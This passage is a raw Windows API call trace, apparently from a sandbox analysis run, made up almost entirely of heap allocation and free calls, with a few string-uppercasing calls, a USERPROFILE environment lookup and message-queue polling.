[0208.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0208.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0208.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0208.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0208.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0208.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0208.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0208.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0208.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0208.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0208.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0208.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0208.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0208.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b98 [0208.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0208.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0208.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0208.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0208.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0208.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0208.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0208.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0208.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0208.879] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0208.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa690 [0208.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0208.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa810 [0208.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0208.880] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0208.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0208.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0208.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0208.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0208.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0208.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0208.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0208.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0208.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0208.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0208.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0208.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0208.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0208.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0208.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0208.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0208.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0208.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0208.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0208.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0208.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0208.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ab8 [0208.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0208.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0208.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0208.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0208.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b88 [0208.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0208.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0208.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0208.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa540 [0208.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0208.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0208.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0208.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0208.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0208.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0208.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0208.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0208.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0208.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0208.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0208.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0208.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0208.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0208.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0208.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0208.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0208.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0208.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0208.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0208.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0208.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0208.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0208.882] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0208.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0208.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0208.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0208.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0208.882] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0208.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0208.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0208.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0208.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0208.883] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0208.883] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0208.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0208.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0208.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0208.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0208.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0208.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0208.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0208.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0208.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0208.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0208.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0208.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0208.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0208.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0208.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0208.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0208.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0208.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0208.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0208.884] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0208.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0208.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0208.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0208.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0208.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0208.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0208.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0208.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0208.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0208.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0208.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0208.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0208.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0208.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0208.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0208.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0208.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0208.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0208.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0208.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0208.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0208.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0208.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0208.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0208.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0208.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0208.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0208.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0208.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0208.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0208.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0208.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0208.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.886] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0208.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0208.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0208.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0208.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0208.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0208.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0208.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0208.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0208.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0208.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0208.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0208.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0208.887] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0208.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0208.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0208.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0208.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0208.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0208.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0208.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0208.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0208.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0208.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0208.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0208.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0208.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0208.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 